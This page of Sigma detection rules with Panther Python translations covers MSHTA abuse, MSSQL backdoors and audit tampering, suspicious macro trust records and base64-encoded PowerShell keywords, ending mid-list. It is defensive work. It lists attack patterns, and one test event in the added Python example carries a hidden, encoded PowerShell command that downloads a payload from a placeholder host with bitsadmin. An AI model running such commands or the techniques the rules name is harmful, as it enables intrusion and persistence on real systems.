Detects execution of mshta.exe with file types that look like they do not typically represent HTA (HTML Application) content, such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
status test author Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems) id cc7abbd0-762b-41e3-8a26-57ad50d2eea3
panther query
def rule(event):
    if all(
        [
            any(
                [
                    event.deep_get("Image", default="").endswith("\\mshta.exe"),
                    event.deep_get("OriginalFileName", default="") == "mshta.exe",
                ]
            ),
            any(
                [
                    ".7z" in event.deep_get("CommandLine", default=""),
                    ".avi" in event.deep_get("CommandLine", default=""),
                    ".bat" in event.deep_get("CommandLine", default=""),
                    ".bmp" in event.deep_get("CommandLine", default=""),
                    ".conf" in event.deep_get("CommandLine", default=""),
                    ".csv" in event.deep_get("CommandLine", default=""),
                    ".dll" in event.deep_get("CommandLine", default=""),
                    ".doc" in event.deep_get("CommandLine", default=""),
                    ".gif" in event.deep_get("CommandLine", default=""),
                    ".gz" in event.deep_get("CommandLine", default=""),
                    ".ini" in event.deep_get("CommandLine", default=""),
                    ".jpe" in event.deep_get("CommandLine", default=""),
                    ".jpg" in event.deep_get("CommandLine", default=""),
                    ".json" in event.deep_get("CommandLine", default=""),
                    ".lnk" in event.deep_get("CommandLine", default=""),
                    ".log" in event.deep_get("CommandLine", default=""),
                    ".mkv" in event.deep_get("CommandLine", default=""),
                    ".mp3" in event.deep_get("CommandLine", default=""),
                    ".mp4" in event.deep_get("CommandLine", default=""),
                    ".pdf" in event.deep_get("CommandLine", default=""),
                    ".png" in event.deep_get("CommandLine", default=""),
                    ".ppt" in event.deep_get("CommandLine", default=""),
                    ".rar" in event.deep_get("CommandLine", default=""),
                    ".rtf" in event.deep_get("CommandLine", default=""),
                    ".svg" in event.deep_get("CommandLine", default=""),
                    ".tar" in event.deep_get("CommandLine", default=""),
                    ".tmp" in event.deep_get("CommandLine", default=""),
                    ".txt" in event.deep_get("CommandLine", default=""),
                    ".xls" in event.deep_get("CommandLine", default=""),
                    ".xml" in event.deep_get("CommandLine", default=""),
                    ".yaml" in event.deep_get("CommandLine", default=""),
                    ".yml" in event.deep_get("CommandLine", default=""),
                    ".zip" in event.deep_get("CommandLine", default=""),
                    "vbscript" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSHTA Execution with Suspicious File Extensions
id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
status: test
description: |
    Detects execution of mshta.exe with file types that look like they do not typically represent HTA (HTML Application) content,
    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
references:
    - http://blog.sevagas.com/?Hacking-around-HTA-files
    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
    - https://twitter.com/mattifestation/status/1326228491302563846
    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2019-02-22
modified: 2025-05-12
tags:
    - attack.stealth
    - attack.t1140
    - attack.t1218.005
    - attack.execution
    - attack.t1059.007
    - cve.2020-1599
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\mshta.exe'
        - OriginalFileName: 'mshta.exe'
    selection_cli:
        CommandLine|contains:
            - '.7z'
            - '.avi'
            - '.bat'
            - '.bmp'
            - '.conf'
            - '.csv'
            - '.dll'
            - '.doc'
            - '.gif'
            - '.gz'
            - '.ini'
            - '.jpe'
            - '.jpg'
            - '.json'
            - '.lnk'
            - '.log'
            - '.mkv'
            - '.mp3'
            - '.mp4'
            - '.pdf'
            - '.png'
            - '.ppt'
            - '.rar'
            - '.rtf'
            - '.svg'
            - '.tar'
            - '.tmp'
            - '.txt'
            - '.xls'
            - '.xml'
            - '.yaml'
            - '.yml'
            - '.zip'
            - 'vbscript'
            # - '.chm'  # could be prone to false positives
            # - '.exe'
    condition: all of selection_*
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high
high
MSMQ Corrupted Packet Encountered
Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
status test author Nasreddine Bencherchali (Nextron Systems) id ae94b10d-fee9-4767-82bb-439b309d5a27
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSMQ",
            event.deep_get("EventID", default="") == 2027,
            event.deep_get("Level", default="") == 2,
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSMQ Corrupted Packet Encountered
id: ae94b10d-fee9-4767-82bb-439b309d5a27
status: test
description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
references:
    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-21
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSMQ'
        EventID: 2027
        Level: 2
    condition: selection
falsepositives:
    - Unknown
level: high
high
MSSQL Add Account To Sysadmin Role
Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
status test author Nasreddine Bencherchali (Nextron Systems) id 08200f85-2678-463e-9c32-88dce2f073d1
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sysadmin" in event.deep_get("Data", default=""),
            "statement:alter server role [sysadmin] add member "
            in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Add Account To Sysadmin Role
id: 08200f85-2678-463e-9c32-88dce2f073d1
status: test
description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sysadmin'
            - 'statement:alter server role [sysadmin] add member '
    condition: selection
falsepositives:
    - Rare legitimate administrative activity
level: high
high
MSSQL Disable Audit Settings
Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
status test author Nasreddine Bencherchali (Nextron Systems) id 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            any(
                [
                    "statement:ALTER SERVER AUDIT" in event.deep_get("Data", default=""),
                    "statement:DROP SERVER AUDIT" in event.deep_get("Data", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Disable Audit Settings
id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df
status: test
description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16
    - https://learn.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.defense-impairment
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains:
            - 'statement:ALTER SERVER AUDIT'
            - 'statement:DROP SERVER AUDIT'
    condition: selection
falsepositives:
    - This event should only fire when an administrator is modifying the audit policy, which should be a rare occurrence once it's set up
level: high
high
MSSQL Extended Stored Procedure Backdoor Maggie
This rule detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL server
status test author Denis Szadkowski, DIRT / DCSO CyTec id 711ab2fe-c9ba-4746-8840-5228a58c3cb8
panther query
def rule(event):
    if all(
        [
            event.deep_get("Provider_Name", default="") == "MSSQLSERVER",
            event.deep_get("EventID", default="") == 8128,
            "maggie" in event.deep_get("Message", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL Extended Stored Procedure Backdoor Maggie
id: 711ab2fe-c9ba-4746-8840-5228a58c3cb8
status: test
description: This rule detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL server
references:
    - https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
author: Denis Szadkowski, DIRT / DCSO CyTec
date: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546
    - detection.emerging-threats
logsource:
    product: windows
    service: application
detection:
    selection:
        Provider_Name: 'MSSQLSERVER'
        EventID: 8128
        Message|contains: 'maggie'
    condition: selection
falsepositives:
    - Legitimate extended stored procedures named maggie
level: high
high
MSSQL SPProcoption Set
Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
status test author Nasreddine Bencherchali (Nextron Systems) id b3d57a5c-c92e-4b48-9a79-5f124b7cf964
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:sp_procoption" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL SPProcoption Set
id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964
status: test
description: Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-13
modified: 2024-06-26
tags:
    - attack.persistence
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "sp_procoption" must be enabled in order to receive this event in the application log'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            - 'object_name:sp_procoption'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Legitimate use of the feature by administrators (rare)
level: high
high
MSSQL XPCmdshell Option Change
Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
status test author Nasreddine Bencherchali (Nextron Systems) id d08dd86f-681e-4a00-a92c-1db218754417
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 15457,
            "xp_cmdshell" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL XPCmdshell Option Change
id: d08dd86f-681e-4a00-a92c-1db218754417
status: test
description: |
    Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 15457
        Data|contains: 'xp_cmdshell'
    condition: selection
falsepositives:
    - Legitimate enable/disable of the setting
    - Note that the event contains the change for both values, so this will trigger on both enable and disable
level: high
high
MSSQL XPCmdshell Suspicious Execution
Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
status test author Nasreddine Bencherchali (Nextron Systems) id 7f103213-a04e-4d59-8261-213dddf22314
panther query
def rule(event):
    if all(
        [
            "MSSQL" in event.deep_get("Provider_Name", default=""),
            event.deep_get("EventID", default="") == 33205,
            "object_name:xp_cmdshell" in event.deep_get("Data", default=""),
            "statement:EXEC" in event.deep_get("Data", default=""),
        ]
    ):
        return True
    return False
view Sigma YAML
title: MSSQL XPCmdshell Suspicious Execution
id: 7f103213-a04e-4d59-8261-213dddf22314
status: test
description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands
references:
    - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-06-26
tags:
    - attack.execution
logsource:
    product: windows
    service: application
    definition: 'Requirements: MSSQL audit policy to monitor for "xp_cmdshell" must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012)'
    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly
detection:
    selection:
        Provider_Name|contains: 'MSSQL' # Note: We use contains to account for other third party providers - See https://github.com/SigmaHQ/sigma/issues/4876
        EventID: 33205
        Data|contains|all:
            # You can modify this to include specific commands
            - 'object_name:xp_cmdshell'
            - 'statement:EXEC'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Macro Enabled In A Potentially Suspicious Document
Detects registry changes to Office trust records where the path is located in a potentially suspicious location
status test author Nasreddine Bencherchali (Nextron Systems) id a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
panther query
def rule(event):
    if all(
        [
            "\\Security\\Trusted Documents\\TrustRecords"
            in event.deep_get("TargetObject", default=""),
            any(
                [
                    "/AppData/Local/Microsoft/Windows/INetCache/"
                    in event.deep_get("TargetObject", default=""),
                    "/AppData/Local/Temp/" in event.deep_get("TargetObject", default=""),
                    "/PerfLogs/" in event.deep_get("TargetObject", default=""),
                    "C:/Users/Public/" in event.deep_get("TargetObject", default=""),
                    "file:///D:/" in event.deep_get("TargetObject", default=""),
                    "file:///E:/" in event.deep_get("TargetObject", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Macro Enabled In A Potentially Suspicious Document
id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd
related:
    - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2
      type: derived
status: test
description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
references:
    - https://twitter.com/inversecos/status/1494174785621819397
    - Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-21
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection_value:
        TargetObject|contains: '\Security\Trusted Documents\TrustRecords'
    selection_paths:
        TargetObject|contains:
            # Note: add more locations where you don't expect a user to execute macro-enabled docs
            - '/AppData/Local/Microsoft/Windows/INetCache/'
            - '/AppData/Local/Temp/'
            - '/PerfLogs/'
            - 'C:/Users/Public/'
            - 'file:///D:/'
            - 'file:///E:/'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
high
Malicious Base64 Encoded PowerShell Keywords in Command Lines
Detects base64 encoded strings used in hidden malicious PowerShell command lines
status test author John Lambert (rule) id f26c6093-6f14-4b12-800f-0fcb46f5ffd0
panther query
def rule(event):
    if all(
        [
            any(
                [
                    any(
                        [
                            event.deep_get("Image", default="").endswith("\\powershell.exe"),
                            event.deep_get("Image", default="").endswith("\\pwsh.exe"),
                        ]
                    ),
                    event.deep_get("OriginalFileName", default="")
                    in ["PowerShell.EXE", "pwsh.dll"],
                ]
            ),
            " hidden " in event.deep_get("CommandLine", default=""),
            any(
                [
                    "AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA"
                    in event.deep_get("CommandLine", default=""),
                    "aXRzYWRtaW4gL3RyYW5zZmVy" in event.deep_get("CommandLine", default=""),
                    "IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA"
                    in event.deep_get("CommandLine", default=""),
                    "JpdHNhZG1pbiAvdHJhbnNmZX" in event.deep_get("CommandLine", default=""),
                    "YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg"
                    in event.deep_get("CommandLine", default=""),
                    "Yml0c2FkbWluIC90cmFuc2Zlc" in event.deep_get("CommandLine", default=""),
                    "AGMAaAB1AG4AawBfAHMAaQB6AGUA" in event.deep_get("CommandLine", default=""),
                    "JABjAGgAdQBuAGsAXwBzAGkAegBlA" in event.deep_get("CommandLine", default=""),
                    "JGNodW5rX3Npem" in event.deep_get("CommandLine", default=""),
                    "QAYwBoAHUAbgBrAF8AcwBpAHoAZQ" in event.deep_get("CommandLine", default=""),
                    "RjaHVua19zaXpl" in event.deep_get("CommandLine", default=""),
                    "Y2h1bmtfc2l6Z" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg"
                    in event.deep_get("CommandLine", default=""),
                    "lPLkNvbXByZXNzaW9u" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uQ29tcHJlc3Npb2" in event.deep_get("CommandLine", default=""),
                    "Ty5Db21wcmVzc2lvb" in event.deep_get("CommandLine", default=""),
                    "AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ"
                    in event.deep_get("CommandLine", default=""),
                    "kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA"
                    in event.deep_get("CommandLine", default=""),
                    "lPLk1lbW9yeVN0cmVhb" in event.deep_get("CommandLine", default=""),
                    "SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A"
                    in event.deep_get("CommandLine", default=""),
                    "SU8uTWVtb3J5U3RyZWFt" in event.deep_get("CommandLine", default=""),
                    "Ty5NZW1vcnlTdHJlYW" in event.deep_get("CommandLine", default=""),
                    "4ARwBlAHQAQwBoAHUAbgBrA" in event.deep_get("CommandLine", default=""),
                    "5HZXRDaHVua" in event.deep_get("CommandLine", default=""),
                    "AEcAZQB0AEMAaAB1AG4Aaw" in event.deep_get("CommandLine", default=""),
                    "LgBHAGUAdABDAGgAdQBuAGsA" in event.deep_get("CommandLine", default=""),
                    "LkdldENodW5r" in event.deep_get("CommandLine", default=""),
                    "R2V0Q2h1bm" in event.deep_get("CommandLine", default=""),
                    "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A"
                    in event.deep_get("CommandLine", default=""),
                    "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA"
                    in event.deep_get("CommandLine", default=""),
                    "RIUkVBRF9JTkZPNj" in event.deep_get("CommandLine", default=""),
                    "SFJFQURfSU5GTzY0" in event.deep_get("CommandLine", default=""),
                    "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA"
                    in event.deep_get("CommandLine", default=""),
                    "VEhSRUFEX0lORk82N" in event.deep_get("CommandLine", default=""),
                    "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA"
                    in event.deep_get("CommandLine", default=""),
                    "cmVhdGVSZW1vdGVUaHJlYW" in event.deep_get("CommandLine", default=""),
                    "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA"
                    in event.deep_get("CommandLine", default=""),
                    "NyZWF0ZVJlbW90ZVRocmVhZ" in event.deep_get("CommandLine", default=""),
                    "Q3JlYXRlUmVtb3RlVGhyZWFk" in event.deep_get("CommandLine", default=""),
                    "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA"
                    in event.deep_get("CommandLine", default=""),
                    "0AZQBtAG0AbwB2AGUA" in event.deep_get("CommandLine", default=""),
                    "1lbW1vdm" in event.deep_get("CommandLine", default=""),
                    "AGUAbQBtAG8AdgBlA" in event.deep_get("CommandLine", default=""),
                    "bQBlAG0AbQBvAHYAZQ" in event.deep_get("CommandLine", default=""),
                    "bWVtbW92Z" in event.deep_get("CommandLine", default=""),
                    "ZW1tb3Zl" in event.deep_get("CommandLine", default=""),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
status: test
description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
references:
    - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
author: John Lambert (rule)
date: 2019-01-16
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_hidden:
        CommandLine|contains: ' hidden '
    selection_encoded:
        CommandLine|contains:
            - 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'
            - 'aXRzYWRtaW4gL3RyYW5zZmVy'
            - 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'
            - 'JpdHNhZG1pbiAvdHJhbnNmZX'
            - 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'
            - 'Yml0c2FkbWluIC90cmFuc2Zlc'
            - 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'
            - 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'
            - 'JGNodW5rX3Npem'
            - 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'
            - 'RjaHVua19zaXpl'
            - 'Y2h1bmtfc2l6Z'
            - 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'
            - 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'
            - 'lPLkNvbXByZXNzaW9u'
            - 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'
            - 'SU8uQ29tcHJlc3Npb2'
            - 'Ty5Db21wcmVzc2lvb'
            - 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'
            - 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'
            - 'lPLk1lbW9yeVN0cmVhb'
            - 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'
            - 'SU8uTWVtb3J5U3RyZWFt'
            - 'Ty5NZW1vcnlTdHJlYW'
            - '4ARwBlAHQAQwBoAHUAbgBrA'
            - '5HZXRDaHVua'
            - 'AEcAZQB0AEMAaAB1AG4Aaw'
            - 'LgBHAGUAdABDAGgAdQBuAGsA'
            - 'LkdldENodW5r'
            - 'R2V0Q2h1bm'
            - 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'
            - 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'
            - 'RIUkVBRF9JTkZPNj'
            - 'SFJFQURfSU5GTzY0'
            - 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'
            - 'VEhSRUFEX0lORk82N'
            - 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'
            - 'cmVhdGVSZW1vdGVUaHJlYW'
            - 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'
            - 'NyZWF0ZVJlbW90ZVRocmVhZ'
            - 'Q3JlYXRlUmVtb3RlVGhyZWFk'
            - 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'
            - '0AZQBtAG0AbwB2AGUA'
            - '1lbW1vdm'
            - 'AGUAbQBtAG8AdgBlA'
            - 'bQBlAG0AbQBvAHYAZQ'
            - 'bWVtbW92Z'
            - 'ZW1tb3Zl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
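The fragment list above is not hand-picked: each plaintext keyword appears in base64 in three different ways depending on whether it starts at byte 0, 1 or 2 of a 3-byte group, and PowerShell's `-EncodedCommand` takes UTF-16LE, so every keyword yields six fragments once the characters that also encode neighbouring bytes are trimmed (the technique in the linked Lee Holmes post). The following added example is not part of the original page or of the SigmaHQ/Panther rule; it regenerates the fragments from the plain keywords (recovered here by decoding the rule's entries), then runs the rule's three selections over constructed process-creation events. The image path, the command lines and the download URL are placeholders.

```python
from __future__ import annotations

import base64

# Plaintext keywords behind the rule's fragments (recovered by decoding them).
KEYWORDS = [
    "bitsadmin /transfer",
    "$chunk_size",
    "IO.Compression",
    "IO.MemoryStream",
    ".GetChunk",
    "THREAD_INFO64",
    "CreateRemoteThread",
    "memmove",
]

# Leading base64 characters that also carry bits of the unknown bytes in
# front of the keyword, for each alignment inside a 3-byte group.
_LEADING_DROP = {0: 0, 1: 2, 2: 3}


def base64_variants(keyword: str, encoding: str = "utf-8") -> list[str]:
    """Return the three alignment-independent base64 substrings of keyword.

    For each offset the keyword is encoded behind `offset` placeholder bytes;
    every character whose value depends on the placeholder, or on whatever
    follows the keyword, is cut off, so the remainder matches in any context.
    """
    raw = keyword.encode(encoding)
    variants = []
    for offset in range(3):
        padded = b"\x00" * offset + raw
        enc = base64.b64encode(padded).decode("ascii").rstrip("=")
        # A partial final group ends in a character that also encodes bits of
        # the next byte; drop it unless the data ends on a group boundary.
        end = len(enc) - (1 if len(padded) % 3 else 0)
        variants.append(enc[_LEADING_DROP[offset]:end])
    return variants


def indicators(keywords: list[str] = KEYWORDS) -> list[str]:
    """Six fragments per keyword: three alignments x {UTF-8, UTF-16LE}."""
    out: list[str] = []
    for kw in keywords:
        for enc in ("utf-8", "utf-16-le"):
            out.extend(base64_variants(kw, enc))
    return out


INDICATORS = indicators()


def rule(event: dict) -> bool:
    """The rule's logic (image, ' hidden ', encoded keyword) with a generated list."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "")
    cmd = event.get("CommandLine", "")
    is_powershell = image.endswith(("\\powershell.exe", "\\pwsh.exe")) or original in (
        "PowerShell.EXE",
        "pwsh.dll",
    )
    # base64 is case-sensitive, so the fragment test must be too; only the
    # ' hidden ' check is case-folded.
    return is_powershell and " hidden " in cmd.lower() and any(i in cmd for i in INDICATORS)


def encoded_command(script: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"  # placeholder

# Constructed process_creation events (not real telemetry).
SAMPLE_EVENTS = [
    {  # hidden window + encoded bitsadmin download: should fire
        "Image": PS_IMAGE,
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -w hidden -enc "
        + encoded_command("Start-Sleep 2;bitsadmin /transfer dl http://c2.invalid/p.bin C:\\Users\\Public\\p.bin"),
    },
    {  # hidden window, harmless script: no keyword fragment present
        "Image": PS_IMAGE,
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -w hidden -enc " + encoded_command("Get-Date"),
    },
    {  # same payload without ' hidden ': all three selections are required
        "Image": PS_IMAGE,
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -enc "
        + encoded_command("bitsadmin /transfer dl http://c2.invalid/p.bin C:\\p.bin"),
    },
]


def run_samples() -> list[bool]:
    return [rule(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for kw in KEYWORDS:
        print(kw, base64_variants(kw), base64_variants(kw, "utf-16-le"))
    print(run_samples())
```

The first sample deliberately puts 14 characters (28 UTF-16LE bytes) in front of `bitsadmin`, so the keyword lands at alignment 1 and only the `IAaQB0...` fragment can match; that is exactly why the rule carries all three alignments. The generator reproduces the rule's alignment-0 and alignment-1 strings exactly; the rule's alignment-2 entries start one character later than the generated ones (one fully keyword-determined character was also trimmed), so each rule entry is a substring of the generated fragment and matches the same command lines. Note that Sigma's `contains` is case-insensitive by default while base64 is case-sensitive, so a backend that case-folds will match a superset of what this Python `in` test matches.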
high
Malicious DLL File Dropped in the Teams or OneDrive Folder
